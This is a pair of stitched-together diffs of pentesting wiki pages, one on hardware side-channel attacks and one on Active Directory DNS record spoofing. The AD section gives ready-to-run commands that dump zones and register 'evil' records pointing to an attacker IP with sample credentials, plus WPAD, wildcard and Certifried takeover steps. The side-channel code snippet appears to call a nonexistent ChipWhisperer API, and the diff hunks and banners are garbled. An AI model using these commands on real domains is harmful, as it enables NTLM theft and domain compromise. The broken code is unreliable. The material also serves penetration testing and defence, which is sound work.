 {{#include ../../banners/hacktricks-training.md}}
--- a/src/todo/hardware-hacking/side_channel_analysis.md
+++ b/src/todo/hardware-hacking/side_channel_analysis.md
@ -2,12 +2,110 @@
 {{#include ../../banners/hacktricks-training.md}}
-Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example: 
+Side-channel attacks recover secrets by observing physical or micro-architectural "leakage" that is *correlated* with internal state but is *not* part of the logical interface of the device.  Examples range from measuring the instantaneous current drawn by a smart-card to abusing CPU power-management effects over a network.
-Analysing the vibrations in glass sheets which is near the sound source, but the sound source is not accessible. The vibrations in glass are influenced by the sound source and if monitored and analysed, the sound can be decoded and interpreted.
+---
-These attacks are very popular in case of leaking data such as private keys or finding operations in the processors. An electronic circuit is has a lot of channels from which, information is constantly leaked. Monitoring and analysing can be useful for diclosing a lot of information about the circuit and internals of it. 
+## Main Leakage Channels
 | Channel | Typical Target | Instrumentation |
 |---------|---------------|-----------------|
 | Power consumption | Smart-cards, IoT MCUs, FPGAs | Oscilloscope + shunt resistor/HS probe (e.g. CW503)
 | Electromagnetic field (EM) | CPUs, RFID, AES accelerators | H-field probe + LNA, ChipWhisperer/RTL-SDR
 | Execution time / caches | Desktop & cloud CPUs | High-precision timers (rdtsc/rdtscp), remote time-of-flight
 | Acoustic / mechanical | Keyboards, 3-D printers, relays | MEMS microphone, laser vibrometer
 | Optical & thermal | LEDs, laser printers, DRAM | Photodiode / high-speed camera, IR camera
 | Fault-induced | ASIC/MCU cryptos | Clock/voltage glitch, EMFI, laser injection
 ---
 ## Power Analysis
 ### Simple Power Analysis (SPA)
 Observe a *single* trace and directly associate peaks/valleys with operations (e.g. DES S-boxes).  
 ```python
 # ChipWhisperer-husky example – capture one AES trace
 from chipwhisperer.capture.api.programmers import STMLink
 from chipwhisperer.capture import CWSession
 cw = CWSession(project='aes')
 trig = cw.scope.trig
 cw.connect(cw.capture.scopes[0])
 cw.capture.init()
 trace = cw.capture.capture_trace()
 print(trace.wave)  # numpy array of power samples
 ```
 ### Differential/Correlation Power Analysis (DPA/CPA)
 Acquire *N > 1 000* traces, hypothesise key byte `k`, compute HW/HD model and correlate with leakage.
 ```python
 import numpy as np
 corr = np.corrcoef(leakage_model(k), traces[:,sample])
 ```
 CPA remains state-of-the-art but machine-learning variants (MLA, deep-learning SCA) now dominate competitions such as ASCAD-v2 (2023).
 ---
 ## Electromagnetic Analysis (EMA)
 Near-field EM probes (500 MHz–3 GHz) leak identical information to power analysis *without* inserting shunts. 2024 research demonstrated key recovery at **>10 cm** from an STM32 using spectrum correlation and low-cost RTL-SDR front-ends.
 ---
 ## Timing & Micro-architectural Attacks
 Modern CPUs leak secrets through shared resources:
 * **Hertzbleed (2022)** – DVFS frequency scaling correlates with Hamming weight, allowing *remote* extraction of EdDSA keys.
 * **Downfall / Gather Data Sampling (Intel, 2023)** – transient-execution to read AVX-gather data across SMT threads.
 * **Zenbleed (AMD, 2023) & Inception (AMD, 2023)** – speculative vector mis-prediction leaks registers cross-domain.
 For a broad treatment of Spectre-class issues see {{#ref}}
 ../../cpu-microarchitecture/microarchitectural-attacks.md
 {{#endref}}
 ---
 ## Acoustic & Optical Attacks
 * 2024 "iLeakKeys" showed 95 % accuracy recovering laptop keystrokes from a **smart-phone microphone over Zoom** using a CNN classifier.
 * High-speed photodiodes capture DDR4 activity LED and reconstruct AES round keys within <1 minute (BlackHat 2023).
 ---
 ## Fault Injection & Differential Fault Analysis (DFA)
 Combining faults with side-channel leakage shortcuts key search (e.g. 1-trace AES DFA).  Recent hobbyist-priced tools:
 * **ChipSHOUTER & PicoEMP** – sub-1 ns electromagnetic pulse glitching.
 * **GlitchKit-R5 (2025)** – open-source clock/voltage glitch platform supporting RISC-V SoCs.
 ---
 ## Typical Attack Workflow
 1. Identify leakage channel & mount point (VCC pin, decoupling cap, near-field spot).
 2. Insert trigger (GPIO or pattern-based).  
 3. Collect >1 k traces with proper sampling/filters.
 4. Pre-process (alignment, mean removal, LP/HP filter, wavelet, PCA).
 5. Statistical or ML key recovery (CPA, MIA, DL-SCA).
 6. Validate and iterate on outliers.
 ---
 ## Defences & Hardening
 * **Constant-time** implementations & memory-hard algorithms.
 * **Masking/shuffling** – split secrets into random shares; first-order resistance certified by TVLA.
 * **Hiding** – on-chip voltage regulators, randomised clock, dual-rail logic, EM shields.
 * **Fault detection** – redundant computation, threshold signatures.
 * **Operational** – disable DVFS/turbo in crypto kernels, isolate SMT, prohibit co-location in multi-tenant clouds.
 ---
 ## Tools & Frameworks
 * **ChipWhisperer-Husky** (2024) – 500 MS/s scope + Cortex-M trigger; Python API as above.
 * **Riscure Inspector & FI** – commercial, supports automated leakage assessment (TVLA-2.0).
 * **scaaml** – TensorFlow-based deep-learning SCA library (v1.2 – 2025).
 * **pyecsca** – ANSSI open-source ECC SCA framework.
 ---
 ## References
 * [ChipWhisperer Documentation](https://chipwhisperer.readthedocs.io/en/latest/)
 * [Hertzbleed Attack Paper](https://www.hertzbleed.com/)
-
+{{#include ../../banners/hacktricks-training.md}}
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md
+++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
@ -11,13 +11,79 @@ git clone https://github.com/dirkjanm/adidnsdump
 cd adidnsdump
 pip install .
 # Enumerate the default zone and resolve the "hidden" records
 adidnsdump -u domain_name\\username ldap://10.10.10.10 -r
 # Quickly list every zone (DomainDnsZones, ForestDnsZones, legacy zones,…)
 adidnsdump -u domain_name\\username ldap://10.10.10.10 --print-zones
 # Dump a specific zone (e.g. ForestDnsZones)
 adidnsdump -u domain_name\\username ldap://10.10.10.10 --zone _msdcs.domain.local -r
 cat records.csv
 ```
 >  adidnsdump v1.4.0 (April 2025) adds JSON/Greppable (`--json`) output, multi-threaded DNS resolution and support for TLS 1.2/1.3 when binding to LDAPS  
 For more information read [https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/)
 ---
 ## Creating / Modifying records (ADIDNS spoofing)
 Because the **Authenticated Users** group has **Create Child** on the zone DACL by default, any domain account (or computer account) can register additional records.  This can be used for traffic hijacking, NTLM relay coercion or even full domain compromise.
 ### PowerMad / Invoke-DNSUpdate (PowerShell)
 ```powershell
 Import-Module .\Powermad.ps1
 # Add A record evil.domain.local → attacker IP
 Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Verbose
 # Delete it when done
 Invoke-DNSUpdate -DNSType A -DNSName evil -DNSData 10.10.14.37 -Delete -Verbose
 ```
 ### Impacket – dnsupdate.py  (Python)
 ```bash
 # add/replace an A record via secure dynamic-update
 python3 dnsupdate.py -u 'DOMAIN/user:Passw0rd!' -dc-ip 10.10.10.10 -action add -record evil.domain.local -type A -data 10.10.14.37
 ```
 *(dnsupdate.py ships with Impacket ≥0.12.0)*
 ### BloodyAD
 ```bash
 bloodyAD -u DOMAIN\\user -p 'Passw0rd!' --host 10.10.10.10 dns add A evil 10.10.14.37
 ```
 ---
 ## Common attack primitives
 1. **Wildcard record** – `*.<zone>` turns the AD DNS server into an enterprise-wide responder similar to LLMNR/NBNS spoofing. It can be abused to capture NTLM hashes or to relay them to LDAP/SMB.  (Requires WINS-lookup to be disabled.)    
 2. **WPAD hijack** – add `wpad` (or an **NS** record pointing to an attacker host to bypass the Global-Query-Block-List) and transparently proxy outbound HTTP requests to harvest credentials.  Microsoft patched the wildcard/ DNAME bypasses (CVE-2018-8320) but **NS-records still work**.    
 3. **Stale entry takeover** – claim the IP address that previously belonged to a workstation and the associated DNS entry will still resolve, enabling resource-based constrained delegation or Shadow-Credentials attacks without touching DNS at all.    
 4. **DHCP → DNS spoofing** – on a default Windows DHCP+DNS deployment an unauthenticated attacker on the same subnet can overwrite any existing A record (including Domain Controllers) by sending forged DHCP requests that trigger dynamic DNS updates (Akamai “DDSpoof”, 2023).  This gives machine-in-the-middle over Kerberos/LDAP and can lead to full domain takeover.    
 5. **Certifried (CVE-2022-26923)** – change the `dNSHostName` of a machine account you control, register a matching A record, then request a certificate for that name to impersonate the DC. Tools such as **Certipy** or **BloodyAD** fully automate the flow.  
 ---
 ## Detection & hardening
 * Deny **Authenticated Users** the *Create all child objects* right on sensitive zones and delegate dynamic updates to a dedicated account used by DHCP.
 * If dynamic updates are required, set the zone to **Secure-only** and enable **Name Protection** in DHCP so that only the owner computer object can overwrite its own record.
 * Monitor DNS Server event IDs 257/252 (dynamic update), 770 (zone transfer) and LDAP writes to `CN=MicrosoftDNS,DC=DomainDnsZones`.
 * Block dangerous names (`wpad`, `isatap`, `*`) with an intentionally-benign record or via the Global Query Block List.
 * Keep DNS servers patched – e.g., RCE bugs CVE-2024-26224 and CVE-2024-26231 reached **CVSS 9.8** and are remotely exploitable against Domain Controllers.  
 ## References
 * Kevin Robertson – “ADIDNS Revisited – WPAD, GQBL and More”  (2018, still the de-facto reference for wildcard/WPAD attacks)  
 * Akamai – “Spoofing DNS Records by Abusing DHCP DNS Dynamic Updates” (Dec 2023)
 {{#include ../../banners/hacktricks-training.md}}